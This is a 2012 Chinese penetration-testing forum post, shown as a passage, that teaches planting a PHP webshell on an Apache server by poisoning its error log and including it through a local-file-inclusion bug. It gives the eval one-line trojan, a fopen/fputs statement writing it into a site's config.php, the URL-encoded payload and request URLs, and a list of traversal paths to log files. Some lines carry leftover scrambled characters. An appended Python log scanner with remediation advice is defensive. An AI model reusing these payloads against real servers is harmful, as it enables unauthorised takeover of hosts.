中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Writing a webshell through PHP inclusion of Apache logs

Author: admin    Time: 2012-9-15 14:27
Because the method above is very impractical (in testing I found the logs are often tens of megabytes, which makes it no fun to play with), let's think a step further: we write a real, practical webshell to use, which is far better than the painfully slow approach above.

For example, take the same one-line trojan again:

<?eval($_POST[cmd]);?>

By this point you may already have the idea, and it is a good one. Next, how to write it becomes the question. Use this: fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then fputs writes the server-side one-line trojan <?eval($_POST[cmd]);?> into it. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?>   // writes the one-line trojan into config.php

We submit this statement, let Apache record it in the error log, then include the log, and the shell is written. Remember that it must be converted to URL-encoded form, or it will not work.

Converted:

%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

We submit:

http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

" f2 \9 {2 T5 B. z$ f, G6 Q# n这样就错误日志里就记录下了这行写入webshell的代码。
. J) z8 b4 j# j% U, O4 i我们再来包含日志,提交 ; Q$ s8 B- A7 n4 k4 W7 g( y' Z
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
1 @7 K, S% f; e8 T- l( W4 q4 C$ D' M. R, N$ @' A, z6 l
这样webshell就写入成功了,config.php里就写入一句木马语句 3 |0 H* A/ h4 s& |( \
OK.
/ z" q: U& L+ [3 k# ~6 phttp://www.xxx.com/forum/config.php这个就成了我们的webshell
9 E& s1 Z6 c  ^- A+ z$ z" W直接用lanker的客户端一连,主机就是你的了。
7 o1 A5 T9 c" g4 S1 n
0 y& ]9 q( g# F% v% |6 d% L- ZPS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 0 @2 i) b1 X( G3 I
7 t$ G! m' S9 D, _# _* H3 _
For other log paths, you can guess, or refer to this list.

../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
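From the defender's side, the two things this post depends on are both visible in the web server's own logs: PHP code arriving in a request (and so landing in the access or error log), and an include parameter that points at one of the log paths listed above. The following Python scanner is an added example, not code from the original post; it assumes Apache combined access-log lines and Apache 2.2-style error-log lines, and the sample lines are constructed.

```python
import re
from urllib.parse import unquote

# A log-poisoning payload needs a PHP open tag plus a function such as eval/fopen/fputs.
PHP_TAG = re.compile(r"<\?(php|=)?", re.IGNORECASE)
PHP_FUNCS = re.compile(r"\b(eval|fopen|fputs|fwrite|system|passthru|assert)\s*\(", re.IGNORECASE)

# An include parameter aimed at a log file: ../ traversal ending in a log directory,
# or one of the absolute log directories from the list above.
LOG_INCLUDE = re.compile(
    r"(\.\./)+.*?logs?/|/var/log/|/etc/httpd/logs/|/usr/local/apache/logs/|apache/logs/",
    re.IGNORECASE,
)

def decode(s: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times so double-encoded payloads are still caught."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s

def classify(line: str) -> list[str]:
    """Return the findings for one log line; an empty list means nothing suspicious."""
    text = decode(line)
    findings = []
    if PHP_TAG.search(text) and PHP_FUNCS.search(text):
        findings.append("php-payload-in-log")   # PHP code was written into the log
    if LOG_INCLUDE.search(text):
        findings.append("log-path-in-request")  # a request tried to include a log file
    return findings

def scan(lines):
    """Return (index, findings) for every line that triggers at least one indicator."""
    return [(i, f) for i, line in enumerate(lines) if (f := classify(line))]

# Constructed sample lines (not from any real server); line 1 carries the URL-encoded
# payload from the post, line 2 shows how it appears decoded in the error log.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Sep/2012:14:27:00 +0800] "GET /forum/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Sep/2012:14:27:10 +0800] "GET /%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E HTTP/1.1" 404 213 "-" "Mozilla/5.0"',
    '[Sat Sep 15 14:27:10 2012] [error] [client 203.0.113.5] File does not exist: /var/www/html/<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?>',
    '203.0.113.5 - - [15/Sep/2012:14:27:20 +0800] "GET /z.php?zizzy=../../../../../../var/log/httpd/error_log HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i, f in scan(SAMPLE_LOG):
        print(f"line {i}: {', '.join(f)}")
```

A hit on "php-payload-in-log" means the log file itself now contains executable PHP, so any local-file-inclusion bug elsewhere on the host turns it into a shell; the real fix is to never pass user input to include/require (use an allow-list of page names) and to keep log directories unreadable to the web server user.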




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2